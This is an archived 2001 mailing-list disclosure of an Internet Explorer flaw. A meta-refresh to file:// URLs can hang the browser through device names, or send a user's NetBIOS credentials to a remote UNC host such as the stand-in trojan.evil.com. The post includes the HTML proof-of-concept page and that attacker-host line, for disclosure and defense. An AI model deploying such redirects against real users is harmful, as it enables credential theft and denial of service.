Internet Explorer file:// URL issues

From: Chad Loder (cloder_at_acm.org)
Date: 07/18/01

At 09:09 AM 7/18/2001, aland_at_striker.ottawa.on.ca wrote:

> I question the wisdom of browsers which allow external web pages to
>reference local files via 'file://' URLs.

I brought the following issue to Microsoft's attention in March.

The Internet Explorer browser (I tested versions 5.0 and 5.5)
can be made automatically to open any file:// URLs by including
the following source code in the HTML page:

<HTML>
<HEAD>
<TITLE>this may hang your browser</TITLE>
<META HTTP-EQUIV="REFRESH" CONTENT="0;URL=file://whatever">
</HEAD>
<BODY>This page has moved. Please update your links.</BODY>
</HTML>

This happens without regard to the security zone settings on
the browser (IMHO, automatic redirects of ANY kind should not
be allowed from untrusted-zone pages -- Microsoft seems to
disagree with me).

Why is this a big deal? Because, along the lines of these
other "special file name" issues we've seen over the last
week, you can cause Internet Explorer to open (or attempt
to open) any special file name.

Using the URL file://C:\PRN in the above page-code causes IE 5.x to
permanently hang on Win2k. You have to kill it from the
Task Manager (which brings down all running instances of
IE, quite an annoyance).

Any UNC path can be used. This includes all special device
names (fun stuff like the \\$IPSEC device, maybe?), including
special "remote share" style UNC paths, things like
\\.\PhysicalDrive0, local and remote named pipes (!!),
mailslots, etc.

What's even MORE menacing to me is that UNC paths can
include references to file shares on remote computers
(on the local LAN *or* on the Internet) e.g.:

file://\\trojan.evil.com\HACKME

When Windows tries to open UNC paths like that, by
default it sends the current user's credentials to that
remote host via NetBIOS. So the end result is, any page
on the internet can cause your browser to redirect to
an arbitrary remote NetBIOS host, which causes your credentials
to be sent to that host. The host can be a Trojan which
simply cracks SMB credentials and pairs them with IP
addresses.

Again I stress that this seems to happen regardless of
the security zone settings (you can set up which zones
have remote login enabled, etc., and from my experiments
this bypasses that setting). This would clearly be
contrary to the user's expectations.

When I brought this to Microsoft's attention, their response
was as follows:

         (a) Can you demonstrate an exploit on a system that has
         outgoing NetBIOS ports blocked?

         (b) Causing a user-mode program to hang is not a serious
         security issue (in general, I tend to agree with this)

Microsoft's attitude seems to be "We'll wait until someone
writes an exploit before we attempt to fix the bug." Anyways,
firewall administrators SHOULD be blocking outgoing NetBIOS
ports if at all possible.

And the hanging of a user-mode app, in the absence of buffer
overflows or other stuff, is not (IMHO) that big of a deal.
But given that 5 minutes of experimentation yielded this kind
of hang, I wonder how long it will take for someone to come
up with a real exploit.

Related issues have been discussed before, e.g.

         http://archives.neohapsis.com/archives/win2ksecadvice/2000-q1/0201.html

         Chad Loder
         Principal Engineer
         Rapid 7, Inc.
         www.rapid7.com

Relevant Pages

  • Re: Cache coherency issues using AllocateCommonBuffer(..)
    ... we did put a scope on the remote system looked at the TLPs coming ... and so it seems like we are stuck with AllocateCommonBuffer. ... standard non-common buffer based DMA APIs. ... How soon do you read from the host memory after you believe the DMA ...
    (microsoft.public.development.device.drivers)
  • Re: Error messages for remote desktop connection attempt
    ... Did you enable Remote Desktop connections on the XP Pro host? ... have you checked the EventLog on the host? ... "The net logon service on the local computer started and then ...
    (microsoft.public.windows.terminal_services)
  • Re: browsing over VPN
    ... for browser info to settle down, because it relies on broadcasts and UDP ... > 3) IP's for remote clients MUST be from a static pool in RRAS properties ... >> require that the remotes do not use the same subnet as the LAN machines. ... The RRAS server does proxy ARP for the remote clients on ...
    (microsoft.public.win2000.ras_routing)
  • Question about RSA1 vs DSA fingerprint
    ... I'm connecting to a solaris 8 box on a university LAN, ... This is the "remote" host. ... cygwin, via Sympatico ADSL, ssh version ...
    (comp.security.ssh)
  • Re: Okay, what now?? Cannot publish -- now this is really strange
    ... Microsoft MVP - FrontPage ... If this fails to help then ask your host to run a Server Health Check ... But -- I could see the remote site in FP. ...
    (microsoft.public.frontpage.programming)